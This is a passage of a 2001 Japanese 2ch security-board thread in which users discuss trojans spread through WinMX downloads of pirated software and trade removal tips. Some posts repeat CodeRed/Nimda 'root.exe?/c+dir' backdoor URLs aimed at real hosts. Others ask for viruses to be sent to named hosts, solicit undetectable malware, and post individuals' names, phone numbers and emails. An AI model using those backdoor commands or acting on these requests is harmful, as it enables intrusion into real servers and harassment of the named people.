http://www.excite.co.jp/world/url/body/?wb_url=http%3A%2F%2Fnews.zdnet.co.uk%2Fstory%2F0%2C%2Ct269-s2083755%2C00.html&submit=%83E%83F%83u%83y%81%5B%83W%96%7C%96%F3&wb_lp=ENJA&wb_dis=2&wb_co=excitejapan

504 :名無しさん@お腹いっぱい。:01/11/02 17:52
493じゃなくて502だろ。お間抜けさん。

505 :名無しさん@お腹いっぱい。:01/11/02 18:00
「皮膚」の連発にワラタ

506 :名無しさん@お腹いっぱい。:01/11/02 23:51
http://sasurai.gaiax.com/home/devilman
コイツムカツク!!!
オネガイダカラ、ダレカウィルスオクッテ!!!

507 :名無しさん@お腹いっぱい。:01/11/03 00:29
>>506
っていうか、gaiax自体がむかつく。

508 :名無しさん@お腹いっぱい。:01/11/03 00:43
>>506
なんか、「ウンコ」って名前のカメ泳いでなかった??

509 :名無しさん@お腹いっぱい。:01/11/03 02:54
関係無いかもしれんが、念のため。
さっき「Mr Moonlight」 をMXで落としたが他のとサイズが微妙に違っていた事もあり、
「参照」すると「共有0」・・・。あれっ、俺コイツを何処から落としたんだ?
「ユーザー情報」もずーつと待っていても、でてこないし・・・。
おまけに「接続速度T1」・・・。
MXやっている最中にノートンをアップデートしたが、「定義の更新」じゃなくて、「ノートンアンチウイルス
自体の更新」(システム自体の更新か?)なので、再起動しないと更新完了しない。
仕方なく「削除」した。(泣)
他にDL中が5個程+順番待ちが20個程あったし、もったいなかった、仕方なし!

510 :名無しさん@お腹いっぱい。:01/11/03 03:21
WINMXが使えないよ!!

511 :名無しさん@お腹いっぱい。:01/11/03 09:40
動画は原因じゃないと思うよ…
推測だから、断言はできないけど
もせとかにまで気を回し始めたらきりがないよ

512 :名無しさん@お腹いっぱい。:01/11/03 12:57
> あんたこそ揚げ足取るならちゃんと読め。
> 「似ているのですが」と最初にいってるだろうに。
> 思い込みはどっちだろうね。カコワル。
>

煽られたくらいで↑この部分だけ妙に厨房化してるのが
ひっかかる。
むしろ2ちゃんに染まっりきったヤシのネタ臭がするぞ

513 :f:01/11/03 14:17
漏れもネタな気がしてきた。
今のところmpegから感染するウィルスって見つかってないよね?

514 :名無しさん@お腹いっぱい。:01/11/03 14:18
MXで動画とか落としてるやつをびびらせようとしてるネタ?

515 :名無しさん@お腹いっぱい。:01/11/03 14:39
>>512
いや、ネタじゃないでしょう。あの切れ方は間違いなく天然。
ネタだったらあんなところで切れないで、
もっともらしいことをずっと言いつづけるでしょう。

516 :名無しさん@お腹いっぱい。:01/11/03 14:40
>>514
だから「動画が原因説」はもうとっくに外れているんだって。
おそらく、時限式でしょう。

517 :名無しさん@お腹いっぱい。:01/11/03 16:34
厨房でよくわからんが、htmlなのに拡張子をmpgにするとか
mpgとhtmlファイルをくっつけて拡張子をmpgにしておいた場合、
ウイルス感染させることは出来ないんすか?

518 :名無しさん@お腹いっぱい。:01/11/03 18:27
>>515
mpgデータに不正なヘッダ情報仕込んで、バッファオーバフロ起こせさる方法だったらありえるかもね。
ただ、この場合は実行するプログラムに大きく依存するし、mpgローダは結構研究され尽くしてい
るから、そのようなオーバフロを起こすような間抜けなコードを埋め込まないと思われ。

つーか、それができたら今ごろ大騒ぎだって!

519 :名無しさん@お腹いっぱい。:01/11/05 21:40
あげ

520 :名無しさん@お腹いっぱい。:01/11/06 14:28
て優香、ザマーミロ(藁

521 :名無しさん:01/11/06 22:45
もうこないといった奴は必ずコソーリと見に来ている説。

522 :名無しさん@お腹いっぱい。:01/11/07 13:22
違法行為してるヤツがギャーギャー騒ぐな。くたばれ。

523 :名無しさん@お腹いっぱい。:01/11/07 13:44
>>522
同意まんこ

524 :名無しさん@お腹いっぱい。:01/11/07 13:59
誰がギャーギャー騒いでるって?
ちゃんとこのスレ読んでねえだろ?初めて来ただろ?
流れがわかってねえよボケ。

525 :名無しさん@お腹いっぱい。:01/11/07 14:03
>>524
>誰がギャーギャー騒いでるって?

オマエダYO

526 :名無しさん@お腹いっぱい。:01/11/07 14:09
>>524
そうやってダボハゼみたいに食いつくから
こういう類のウイルスにズタズタにされちゃうんじゃないの?(藁

527 :名無しさん@お腹いっぱい。:01/11/07 14:47
優良スレ age

528 :名無しさん@お腹いっぱい。:01/11/07 14:50
優良ウイルス age

529 :_:01/11/08 20:31
age

530 :名無しさん@お腹いっぱい。:01/11/08 21:39
さて、そろそろ誰かリスト化キボン

531 : :01/11/10 02:01


532 :ギャ-ギャ-:01/11/10 02:05
ギャ-ギャ-

533 :名無しさん@お腹いっぱい。:01/11/10 02:52
MXでウイルス配布面白いな〜
著作権侵害逝って良し

534 :↑↑↑:01/11/10 13:09
割れはイカンと思うが、こういう奴はキモイ

535 : ◆esN0zV4A :01/11/10 13:13
俺も W32.Whiter.Trojan にやられたわ。

536 :名無しさん@お腹いっぱい。:01/11/10 14:32
>>534
キモイっていうか、ウソがバレバレだから痛い。寒い。
配布なんてしてないくせにな。

537 :名無しさん@お腹いっぱい。:01/11/10 15:51
実験の為に拾ってインストしてみた、ってことで
データ飛んだら被害届出せば。なんなら、ほんとに
警察なり民間団体の立会いでやればいいっしょ。

トロイばら撒いてる奴一人くらい、ほんとに生贄にしないと。
オレはMXやってないからどうでもいいが。

538 :名無しさん@お腹いっぱい。:01/11/10 16:37
>>537
何が「実験」だよ。頭おかしいだろ、お前?
くだばれ。

539 :名無しさん@お腹いっぱい。:01/11/10 17:07
>>538
お前、意味わかって反論してるか?
トロイって何か知ってるか?(w

540 :名無しさん@お腹いっぱい。:01/11/10 17:16
トロイをインストか…。素晴らしい!w

541 :名無しさん@お腹いっぱい。:01/11/10 17:56
木馬の中に兵隊が隠れてたなんて、結構無茶な話だネw

542 :名無しさん@お腹いっぱい。:01/11/10 19:27
>>539
そういうオマエのほうが意味分かってんのか?(w

トロイの木馬(Trojan Horse)

 便利なソフトウェアに見せかけて、ユーザに被害を与える不正なプログラムです。
 感染機能は持っていませんので、感染増殖することはありません。トロイの木馬の内部に
 隠していたウイルスをパソコンに組み込んだり、パソコン内部の秘密のファイルをインターネット
 上に送信してしまったり、ファイルやディスク内容を破壊するなど、さまざまな被害があります。

http://www.ipa.go.jp/security/virus/beginner/dic/dic_sub.html#trojan
↑ここ見て勉強しろや(w

すっかり駄スレになってんな。

543 :名無しさん@お腹いっぱい。:01/11/10 19:44
>>542
何当たり前の事を書いてるんだ??

538の書き込みの意味が全然わからん。537の意味を汲み取っているとは思えん。

お前は、トロイをばら撒いている本人って事か?
それなら納得は行くが。

544 :542ではないが:01/11/10 19:51
>>543
折れには539の意味が全然わからん。

545 :名無しさん@お腹いっぱい。:01/11/10 20:24
210.150.115.232

546 :名無しさん@お腹いっぱい。:01/11/10 21:28
>>542
恥ずかしいレスしてんな・・
今更トロイの意味なんて貼るなよ・・・(;´Д`)

547 :名無しさん@お腹いっぱい。:01/11/11 00:10
>>542
セキュ板でこのレス・・・
ビクーリだ

548 :.:01/11/11 19:37
安っすい「割れ試しようPC」一台買ったほうが早いような気がしてきたYO

549 : :01/11/11 20:40
VirtualPC for windowsなんてどう?

550 :名無しさん@お腹いっぱい。:01/11/11 21:28
>>549
あのさ、このスレちゃんと読んだ?激しくがいしゅつ。

551 :依頼人:01/11/12 07:37
Cmtud12DS74.chb.mesh.ad.jp
M110189.ppp.dion.ne.jp
こいつらを頃して下さい。ウィルスで。
おねがいします、このとおりです。

552 :名無しさん@お腹いっぱい。:01/11/12 07:44
>>551
C型肝炎ウィルスでも送り込めばよろしいのでしょうか?

553 :名無しさん@お腹いっぱい。:01/11/14 14:55
最近は、被害報告ないですね〜。
Whiter自体少なくなったのかな?

554 :名無しさん@お腹いっぱい。:01/11/15 10:14
結局、もせオンリーだったら安全なの?

555 :名無しさん@お腹いっぱい。:01/11/15 11:34
>>554
「確率は低くなる」としか言えない
「絶対大丈夫」と言い切れないのがウィルスだからねえ

556 :_:01/11/15 20:53
>>553
このスレのオカゲかと。。。

557 :名無しさん@お腹いっぱい。:01/11/16 18:09
やられた……33バイトづつ細切れに……

サイズ       533 MB (558,895,426 バイト)
ディスク上のサイズ 533 MB (558,923,776 バイト)
Windows_XP_Pro_RC2_Whistler_2526Japanese(要IM).zip
ウイルス検出できんかった。 クソッ!!!

即出だったらゴメン

558 : :01/11/16 18:10
WindowsNTを使ってるんですが
これってひょっとしてウィルスに強いんですかねぇ。

559 :名無しさん@お腹いっぱい。:01/11/16 18:21
>>558
Administrator権限で使ってたら9Xと変わらん。

560 :名無しさん@お腹いっぱい。:01/11/16 18:29
>>557
このスレがあるのに今更引っかかるなんて・・・・
再起動前にレジストリ確認しなかったの?

561 :名無しさん@お腹いっぱい。:01/11/16 18:30
>>557
>やられた……33バイトづつ細切れに……

ちなみに、33バイトづつ細切れに、って間違いだよ。
単にファイルサイズを33バイトにするだけ。
別に細切れになっているわけじゃない。

これに関しては1も間違ってるんだけどね。

562 :名無しさん@お腹いっぱい。:01/11/16 21:15
>>560
今度からそうする。アリガトウ

>>561
そういうことだったのですか。こちらも知識をアリガトウ

33バイトにされたのが所々だけだったのが不幸中の幸いだった。systemは大丈夫そう…
(でも、デスクトップにあるファイル全部33バイトにされた。…鬱)

563 :馬鹿ジャン:01/11/16 22:17
ウィルスウィルスって一体そんなに怖いのか?
なんか見えない世界で、おたくたちが盛り上がってるだけのようなきがする。

564 :名無しさん@お腹いっぱい。:01/11/16 22:37
>>563みたい奴がNimdaにやられるんだろうな…

565 :馬場ぢゃん:01/11/16 23:48
>>563
そりゃ君、淋病罹ったこと無いからそう言えるんだよ。。。
い、いや、漏れの友達、スンゴイ痛いって。。
も、漏れぢゃ無い。

566 :名無しさん@お腹いっぱい。:01/11/17 00:21
>>563
見えてないのはお前だけだよ。
次に再起動したら、お前のマシンのHDDが全部消えてたらどうする?
ウイルスとはそういうものだよ。当たってみて初めて気が付く。
経験の少ないお前には想像つかないだろうけど。

567 :名無しさん@お腹いっぱい。:01/11/17 00:58
未知のウイルスが存在?
http://www.ebcvg.com/vx_exe.html

http://www.ebcvg.com/links.html

IRC.WORM W32.HLLP.Eter.8704 VBS.Rewind.A@mm
Hybris Troj W32.XTC.Worm などがある。

今さら? CodeRed  Nimda?
bleah_bla
http://home10.inet.tele.dk/scripts/root.exe?/c+dir+"c:\
http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=901313&PA=207766&BAN=1

水泥棒「「菊池記念館」」隣人を脅迫!!!!!
http://www.pref.miyazaki.jp/shoukou/kankou/sight/park/hall.htm
http://www.miyanichi.net/benri/museum/hakubutu.html
http://www.miya-shoko.or.jp/nishimera/chiiki/kankou/kikuchi.htm
隣人が設置した水路を横取りしてすべての水を引き込んでいる。
養殖するために大量の水が必要とふざけたことを言いやがる。
養殖で儲けたものは未申告。

em5000.com,optinglobal.comはスパマー
<A HREF="jab1@lists.em5000.com">fullmedical@optinglobal.com</A>
<A HREF="mailop@optinglobal.com">mailop@optinglobal.com</A>
http://www.optinglobal.com/cgi-bin/r.pl?e=jab1@lists.em5000.com
http://www.optinglobal.com/cgi-bin/r.pl?e=mailop@optinglobal.com

To unsubscribe click here or go to http://www.em5000.com/unsub.php?client=jab1
and enter your email address ( jab1@lists.em5000.com )

P.S. Please do not share this number with anyone!
It’s a reserved number that’s meant for you, friend.
Dial 1-800-748-3530. (スパムメールの内容)

568 :名無しさん@お腹いっぱい。:01/11/17 01:07
>>567
未知というか、単にパターンファイルに登録されて無いだけの話。
別に珍しい事ぢゃ無いよ。。。
単にネットで出回って無いだけの話。スクープでもなんでもない。
直リン晒すの止めれ。ウゼーぞ。

569 :名無しさん@お腹いっぱい。:01/11/17 02:33
違法ソフトで感染してる奴はヴァカだね

570 :名無しさん@お腹いっぱい。:01/11/17 02:39
>>569
今更何言ってるんだオマエは。
このスレの内容知らないだろ?

571 :名無しさん@お腹いっぱい。:01/11/17 02:43
>>570
ここは>>1がMXの違法ソフトでやられたスレだろ

572 :名無しさん@お腹いっぱい。:01/11/17 04:50
>>571
スレの流れを読めやボケ。
違法ソフトが悪い、なんてことは前提の上で話してるんだよ。
そんな当然なこと書いたって煽りにもなんねえよ、って言ってんだよ。

つまりお前の書き込みは 「浮いてる」 の。

573 :名無しさん@お腹いっぱい。:01/11/17 08:51
adobeにリンク張っとこ
http://www.adobe.co.jp/

574 :名無しさん@お腹いっぱい。:01/11/17 13:23
ビンラディン.doc.pifってウイルス?

575 :名無しさん@お腹いっぱい。:01/11/17 13:25
>>574
実行すると航空機が落ちてきます。

576 :金田一晴彦:01/11/17 15:50
×違法ソフト
○違法コピーソフト

言葉は正確に使いましょう

577 :名無しさん@お腹いっぱい。:01/11/17 16:19
やっと全部読み終わった。
割れ物がどうのとかは関係無しで、為になったよ。
違法ソフト使ってなくても、危険性はあるよね。

578 :a:01/11/18 01:29
a

579 :em5000.com,optinglobal.comはスパマー:01/11/18 01:34
http://www.ebcvg.com/vx_exe.html
にはIRC.WORM W32.HLLP.Eter.8704 VBS.Rewind.A@mm
Hybris Troj W32.XTC.Worm などがある。


今さら? CodeRed  Nimda?
bleah_bla
http://home10.inet.tele.dk/scripts/root.exe?/c+dir+"c:\
http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=901313&PA=207766&BAN=1

水泥棒「「菊池記念館」」隣人を脅迫!!!!!
http://www.pref.miyazaki.jp/shoukou/kankou/sight/park/hall.htm
http://www.miyanichi.net/benri/museum/hakubutu.html
http://www.miya-shoko.or.jp/nishimera/chiiki/kankou/kikuchi.htm
隣人が設置した水路を横取りしてすべての水を引き込んでいる。
養殖するために大量の水が必要とふざけたことを言いやがる。
養殖で儲けたものは未申告。

em5000.com,optinglobal.comはスパマー
<A HREF="jab1@lists.em5000.com">fullmedical@optinglobal.com</A>
<A HREF="mailop@optinglobal.com">mailop@optinglobal.com</A>
http://www.optinglobal.com/cgi-bin/r.pl?e=jab1@lists.em5000.com
http://www.optinglobal.com/cgi-bin/r.pl?e=mailop@optinglobal.com

To unsubscribe click here or go to http://www.em5000.com/unsub.php?client=jab1
and enter your email address ( jab1@lists.em5000.com )

P.S. Please do not share this number with anyone!
It’s a reserved number that’s meant for you, friend.
Dial 1-800-748-3530. (スパムメールの内容)

580 :579はスパマー:01/11/18 01:55
だよな

581 :名無しさん@お腹いっぱい。:01/11/18 02:20
気にすんな。

582 :名無しさん@お腹いっぱい。:01/11/18 10:13
自分もMXやっててヤラレタよ。
もうMX止めるわ。十分美味しい思いしたしな。
しかも感染源がアンチウィルスだし。あはは。
まあ、笑ってくれ・・・・・・・

583 :名無しさん@お腹いっぱい。:01/11/18 16:54
>>582
ワラタヨ

で?

584 :名無しさん@お腹いっぱい。:01/11/18 17:04
win2kでuser1が使用しているときに感染したとして、次回ログオン時に違うユーザ(user2等)
でログオンした場合って発動しない・・・よね?

585 :名無しさん@お腹いっぱい。:01/11/18 17:24
当然発動するよ

586 :名無しさん@お腹いっぱい。:01/11/18 17:56
win2kでadministrator権限で使わないほうでいいですか?
しょっちゅういろいろ設定変えるんで、そうしているんですが、
やはりuserのほうがいいんでしょうか・・・

587 :株式会社ネックス、株式会社キャッチネットワークはスパマー:01/11/18 20:16
株式会社ネックス、株式会社キャッチネットワークはスパマー
掲示板にしつこく宣伝を書き込むため株式会社ネックス、株式会社キャッチネットワークに対し抗議したが無視。
−−
画質が綺麗 名前:たかし http://211.13.210.40/sv04/adf0040.html
画質が綺麗なのでうなづきました
−−−−−
CodeRed http://211.13.210.40/scripts/root.exe?/c+dir+"c:\
http://www.optinglobal.com/cgi-bin/r.pl?e=okuse@nex.ne.jp
http://www.optinglobal.com/cgi-bin/r.pl?e=n-kato@katch.co.jp
<A HREF="okuse@nex.ne.jp">nic-staff@nex.ne.jp</A> <A HREF="n-kato@katch.co.jp">db-admin@katch.co.jp</A>
211.13.210.40
株式会社サイバービジョン (CyberVision Co.,Ltd.) CV-NET [211.13.210.0 <-> 211.13.210.127] 211.13.210.0/25
メディアエクスチェンジ株式会社 (Media EXchange, Inc.) SUBA-200-C07 [サブアロケーション] 211.13.210.0
[運用責任者][技術連絡担当者]
a.[JPNICハンドル]YO2225JP b.[氏名]奥瀬康仁 c.[Last, First]Okuse,Yasuhito
d.[電子メイル] okuse@nex.ne.jp f.[組織名] 有限会社ネックス g.[Organization]NEX INC.m.[肩書] 代表取締役
n.[Title] President o.[電話番号] 03-5338-3386 p.[FAX番号]03-5338-3086
y.[通知アドレス] nic-staff@nex.ne.jp 株式会社ネックス http://www.n-ex.net/
発信元
210.236.64.
Network Information: [ネットワーク情報]
a.[IPネットワークアドレス]210.236.64.0-210.236.66.0 f.[組織名] KATCH-NET(株式会社キャッチネットワーク)
p.[ネームサーバ]ns2.ctc.ad.jp p.[ネームサーバ]ns.katch.ne.jp
y.[通知アドレス] db-admin@katch.co.jp
[運用責任者]
b.[氏名] 加藤 徳英 d.[電子メイル] n-kato@katch.co.jp
f.[組織名] 株式会社キャッチネットワーク o.[電話番号] 0566-27-0315
p.[FAX番号] 0566-27-5551 y.[通知アドレス] n-kato@katch.co.jp
http://www.katch.co.jp/

588 :名無しさん@お腹いっぱい。:01/11/18 20:51
>>586
使い方によるだろうね

>しょっちゅういろいろ設定変えるんで、そうしているんですが
ならadministratorで使う方がイイでしょ
そのかわり危ないファイルを使わないようにする


アドバイスになってないな…スマソ

589 :Win98ですが:01/11/18 21:24
PhotoShop6.0(j)でやられました。

Zipファイル解凍後Setupファイル実行したら無反応。
ダミーファイルつかまされたと思ってその日は電源断。
あとはおきまりのコースでした。

BearShareで見つけたファイルで、ホストは憶えてないけど接続先に日の丸があったのと
ファイル名に(j)が付いていた事から推測すると、仕込んだのは日本人・・・なのかなぁ?

ちなみにノートン先生見つけてくれなかったよ。

590 :名無しさん@お腹いっぱい。:01/11/18 22:50
>>589
ざま・・

591 :名無しさん@お腹いっぱい。:01/11/19 23:40
トロイ入り撒いてる奴って、拾った奴がソフトメーカーに
訴えられる覚悟で被害届出せば、撒いてる奴もソフトメーカーに
訴えられるから結局同罪なんだよね(w

592 :名無しさん@お腹いっぱい。:01/11/20 03:18
>>591
ソフトメーカーがばら撒いてたりしてね

593 :名無しさん@お腹いっぱい。:01/11/20 04:43
>>592
確かに。その可能性があるから実際に事件化したらおもろいかも。
昔、シェアウェアソフトの製作者が不正尻入れるとHDをフォーマットだか
ファイルの全削除だったかをするという仕掛けをしたらしいが、それを喰らった
不正ユーザが裁判起して勝ったという事件がなかったっけ?

594 :名無しさん@お腹いっぱい。:01/11/20 05:10
>>593
ウィングルーブのことか?

595 :名無しさん@お腹いっぱい。:01/11/20 09:17
スレ全部読んだけどそこまでしてウィルスしこんで共有しては
誰かのHDが逝くことに快感を覚えてる奴ならさ、このスレも読んでるだろうし
今頃ウヒャウヒャ新しいの仕込んでるよ。
何十Gもデータが詰まってるやつならサブマシンもってるだろうし、それで試すしか
ないんじゃないの?

596 : :01/11/20 15:37
wareやめりゃいいじゃん。

597 :名無しさん@お腹いっぱい。:01/11/20 17:28
>>594
詳細きぼーん

598 : :01/11/20 18:03
MXで落としたZIPファイルをノートンアンチウィルスでスキャンすると
「ブートレコード(重要な起動情報が入っている項目)が変わりました。」
と警告されました。
以前の状態にブートレコードを復元しました。
その後ウイルススキャンでは何も引っかかりません。
以前にも同じことがありました。
これって何なんでしょう?

599 :名無しさん@お腹いっぱい。:01/11/20 18:47
>>598
ウィルスの活動の結果を検出できても
ウィルスの存在は検出できないケースも存在すること

600 :598:01/11/20 18:53
>>598
ありがとうございます。
結局どういった活動をしようとしたのか解りませんが
共有するのは止めておきます。
でもウイルススキャンしようとしただけでも
活動することもあるんですね。

601 :名無しさん@お腹いっぱい。:01/11/20 18:59
>>597
事件の詳細
ttp://www.forest.impress.co.jp/article/1998/09/16/wingroove.html
ttp://cyberfield.virtualave.net/r002.html

作者のページ
ttp://www.wg7.com/
作者の言い分
ttp://www.wg7.com/wg09fbdocs/

っていうか、WinGroove も、もう過去のことなのか。
被害を受けた私のキズはまだ癒えてないというのに・・・

602 : :01/11/20 19:11
質問
今連続で別の人からwhatever.exeなるファイルが着ました。
勿論あけませんでした。"
題名some urls i found"
1通目はすぐ削除して気がつかなかったのですが2通目に灰色の
小窓?がでてそこにc;\windows\tempolary internet files\
content Ie5\GXQWHQZ\whatever.exe
とありました(その下に開くか保存かの選択)。
相手のパソコンの中にあるファイルの位置になるのですか?
私のパソコン検索してもwhatever.exeは でてきませんでした。
2人とも同じファイル名と似たような題名でした。

確か一時MSNサイトで見るだけで感染するとかなんとか
あったと思いますがそのたぐいでしょうか?
17時ごろに2通きたのでびっくりしています。

603 :名無しさん@お腹いっぱい。:01/11/20 19:36
>>601
折れは不正尻でフォーマットはイイと思うが、誤動作はやめてほしいね。

604 :buniro:01/11/20 19:43
kimura@dai-nihon.co.jp
↑こいつからウイルス入りのメールが二通来た、腹が立ったのは本文、「ピース」とローマ字で書いてあった・・・なにが「ピース」なんだ!

605 : 602:01/11/20 19:55
>>604
それそれ!同じ!

606 : 602:01/11/20 19:57
>>604
送った人は知らないと思う。
多分自動配信じゃないかな?題名に

:-)このスマイルマークありませんでした?

607 :たげ:01/11/20 20:21
>>604
fromの詐称なんかスキルのうちに入んないし
詐称して無くても当人が被害者の可能性もある

安易にfromのメアドを晒すな

608 :buniro:01/11/20 20:22
オレはその人に返信しちゃった・・・けど、大丈夫かなぁ・・・

609 :buniro:01/11/20 20:23
>607
fromとは何だ?

610 :buniro:01/11/20 20:25
晒すな←読めない。

611 : :01/11/20 20:35
晒すな(さらすな)

612 :名無しさん@お腹いっぱい。:01/11/20 20:42
>602
これね・・・うちにもきたよにつう
http://www.trendmicro.co.jp/virusinfo/vbc_default3.asp?VName=TROJ%5FALIZ%2EA

613 :buniro:01/11/20 20:45
腹が立つからメアドを載せたなにが悪い!

614 :名無しさん@お腹いっぱい。:01/11/20 20:50
TROJ_ALIZ.A
もしかしてウイルスはこれですか?
うちのPC感染してしまいメール送りまくって困ってます。
駆除方法おしえてください

615 :614:01/11/20 20:51

ちなみにメールに添付されてるウイルスは
プロバイダで駆除してあるらしいので届いた
PCには感染しないらしいですが、、、

616 :名無しさん@お腹いっぱい。:01/11/20 20:59
TROJ_ALIZ.Aに該当するウイルス。
日本語でも英語でもないけど、概要が書いてあるよ。
読める人、読んで。

このページの「I-Worm.Aliz」
http://www.avx.ro/html/latest_submissions.php

617 :MX:01/11/20 21:00
ダウソ板見てきたが、なんか動画ファイルにウイルスを仕込むソフト(?)を作成中らしい。
動画見ているだけで、データが…やめてくれ。

618 :名無しさん@お腹いっぱい。:01/11/20 21:04
>>614
最近はコンビニでもアンチウィルスソフトを売っているところがあります。
もしなかったら、今日はPC切って明日朝一で買いに行きましょう。

619 :名無しさん@お腹いっぱい。:01/11/20 21:39
>>614
とりあえずウィンドウズスクリプティングホストを削除して
再起動してみては? VBSワームならとりあえずそれで活動を止め
られるかも。
手順はコントロールパネル→アプリケーションの追加と削除→
Windowsファイルタブ→「アクセサリ」をダブルクリック→
「Windowsスクリプティングホスト」のチェックを外してOK。

620 :名無しさん@お腹いっぱい。:01/11/20 21:50
>>617
動画なら、被害届出せば?浦動画なら猥褻物頒布罪に
問えるよ。

621 :たげ:01/11/20 21:53
>>613
誤爆の可能性があるっていう意味

622 : :01/11/20 22:06
>>619
WINDOWSMEなのですがないです「Windowsスクリプティングホスト」
という項目が・・

623 :名無しさん@お腹いっぱい。:01/11/20 22:11
>>622
すまそ、MEはよくしらん。

624 :619ではない:01/11/20 22:12
>>622
Meならフォルダ開いて、「フォルダオプション」→
「ファイルタイプ」→VBSScriptスクリプトファイルを削除じゃダメ?

625 :624:01/11/20 22:15
追加・フォルダオプションの前に、表示をクリックしないとないはず。

626 : 622:01/11/20 22:18
ありがとうございました!
ありました。削除しておきました。

627 :名無しさん@お腹いっぱい。:01/11/20 22:38
>>617
それどこのスレ?

628 :名無しさん@お腹いっぱい。:01/11/20 22:40
>>626
治まった?

629 :617:01/11/20 22:47
>>627
ねつ造くん?とかいうのがスレのタイトルだったような…
そこの話だと動画なら何にでも仕込めるようにするとかいってた。
ネタかもしれないが。

630 :名無しさん@お腹いっぱい。:01/11/20 23:20
最近、スレ違いのウイルスの話題が増えてきたな・・・

631 : :01/11/21 01:00
>>614
TROJ_ALIZ.Aの情報更新されたよ。
http://www.trendmicro.co.jp/virusinfo/vbc_default3.asp?VName=TROJ%5FALIZ%2EA

632 :名無しさん@お腹いっぱい。:01/11/21 01:25
>>603
誤動作ってのは9割方言い逃れだろ。

あと不正尻だからって即フォーマットは勘弁してほしい。
俺WinGroove正規ユーザだけど
Windows再インストールする時とかに面倒だからって
尻集の尻で済ませちゃうことも結構あるからさー。
それでフォーマットされたらかなわんよ。

633 :名無しさん@お腹いっぱい。 :01/11/21 14:27
{受信バイト・送信バイトが異常に増えます。}
http://pc.2ch.net/test/read.cgi/sec/1001161116/l50

これに書いてある動画ウイルスがめっちゃ気になるんですが…。
私も身に覚えがあるんです。「娘。」系の動画で感染した気がするんです。

634 :名無しさん@お腹いっぱい。:01/11/21 19:16
>>632
折れは再インストール時に面倒だから
自分のシリアル集(不正尻ではないもの)を作って利用してる。

635 :名無しさん@お腹いっぱい。:01/11/21 19:50
>>632
>Windows再インストールする時とかに面倒だからって
>尻集の尻で済ませちゃうことも結構あるからさー。

普通そんなことしないって・・・
管理能力がゼロだな。 自業自得じゃない?

636 :名無しさん@お腹いっぱい。:01/11/21 20:10
WinGroove以外のシリアル入力に活用していると思われ

637 :632:01/11/21 23:33
>>635
俺も以前>>634みたいにしてたんだけど
HDDがクラッシュした時に「オレシリアル集」も一緒に消えちゃったのよ。
で、改めて作者に問い合わせるのも面倒だし面倒かけるしっつーことで
ある時期から尻集しか使わなくなった。

>>636
それもある。

638 :名無しさん@お腹いっぱい。:01/11/22 14:29
一通りよんだ。
おれもMXで落としたCD革命でWhiterにやられた。
興味深くこのスレを読んでいたらヤフオクの取引相手からALIZ入り
メールが送られてきた。
なんだかな〜。
buniroが晒してるメアドは削除依頼ださんでいいのかかな?
ウィルスが自動送信してるだけじゃないの。

639 :名無しさん@お腹いっぱい。:01/11/23 18:09
>>35
漏れもそこの638以降と同じように
フィルダのみ残して
2chのあらゆるスレをエロ画像みんな消えたときが1回だけあった。
グヌテラやMXインストして試してみたことはあったけど
まともに使ったことはない。
原因ははっきりとはわからないな。

640 : :01/11/23 18:22
kowai

641 : :01/11/24 02:46
このウイルスってオンラインスキャンで見つけてくれる?

642 : :01/11/24 13:05
22日に届いたメールが、見かけないアドレスで怪しかったので
添付ファイルを一度保存してから、ウイルスチェックしてみて
安全なら見ようと、思ったんですが、保存しようとしたところで
同じファイルがありますと表示されたので、削除しました。
同日「TROJ_ALIZ.A」に注意するようにってメールがあり、
チェックしようとしたメールが、これらしくとても不安です。
今のところ、ファイルは無事ですが、他に何か起こるのでしょうか?

643 :638:01/11/24 17:44
>>624
>>614>>631見た?
TROJ_ALIZ.Aはファイル消したりはしないんじゃないの。
んで、ウィルススキャンの結果はどうだったのよ?
いきなり「他に何か起こるのでしょうか?」って言ったって
わかる人いないんじゃないの?

644 :こいつキモい!:01/11/25 01:51
トップ ttp://osaka.cool.ne.jp/mikisukesan/index.html

日記 ttp://osaka.cool.ne.jp/mikisukesan/diary/diary10.html

何がキモいかってのはウケ狙いすぎの日記。
マジ狙い杉で寒い。
みきすけになんか言ってやって下さい。

645 :名無しさん@お腹いっぱい。:01/11/25 02:46
>>644
そんなにキモク無いじゃん。
おまえはアクセス数を増やして応援しているのか?

646 :名無しさん@お腹いっぱい。:01/11/25 03:04
644みてーな依頼ヴァカは正直キモイ

647 :名無しさん@お腹いっぱい。:01/11/25 04:11
怖いので、Virtual PCをいれようと思い、
安全だといわれる以下のサイズのものを 3個落としてみた。
Connecti Virtual PC 4.1 (Serialあり) 21,982,327
ところが MD5にかけてみると全部値が違うんじゃ〜

648 :名無しさん@お腹いっぱい。:01/11/25 04:29
>>647
で?

649 :名無しさん@お腹いっぱい。:01/11/28 23:11
さようならMX

650 : ガ━━(゚Д゚;)━━ン! :01/11/30 03:06
基本的にZIPにはウイルスは入ってない事の方が多い。
しかし、エロゲーは欲しいぞ

651 :名無しさん@お腹いっぱい。:01/11/30 03:27
>>598
君はダメな人間だな

652 :名無しさん@お腹いっぱい。:01/11/30 06:29
皆様がお持ちのウイルスを送ってください!
収集用に設けたメアドですから、暴発の心配はありません.
ネットカフェのPCで試しますので、送って下さる時はウイルスチェッカーに検出されないような強力なものをお願いします。

653 :名無しさん@お腹いっぱい。:01/11/30 07:39
ひでえな

654 :名無しさん@お腹いっぱい。:01/11/30 08:59
>>652
ここはセキュ板だ!ゴルァ!
最近、この板も落ちたものだ。

655 :名無しさん@お腹いっぱい。:01/11/30 23:47
ttp://member.nifty.ne.jp/turukame/

656 :名無しさん@お腹いっぱい。:01/12/02 17:02
今まで使ってたPCを売りに出すのですが
HDに残ってる個人情報やエロ画像を他人に見られると
恥ずかしいので削除したいのですが初期化しても消えないので
専用のソフトが必要とのことですが
ヨドバシ.com等を見てもどのカテゴリのソフトなのか解からなくて
見つけ出せないでいます。
またそのソフトってのはフリーウェアには無いのでしょうか?
そして僕はスレチガイデしょうか。
どこにいけばこの話題があるのか見つけられずに
検索してたどり着いたのがココでした。

657 :名無しさん@お腹いっぱい。:01/12/02 17:06
>>656
PGPのdisk wipe機能使ったら?
freeだよ?
軍用レベルでwipeすりゃまず安心だろ。

http://www.pgpi.org/

658 :657:01/12/02 17:08
>>656
>そして僕はスレチガイデしょうか。
ああ、そうだな。
おれも今きづいた。
スマヌ

659 :656:01/12/02 17:28
>657
ありがとうございます。
せっかく教えていただいたのですが英語なんですね・・・
難しいです。
データ削除することをdisk wipeと言うんですかねー。

660 :名無しさん@お腹いっぱい。:01/12/02 18:55
>>657-659
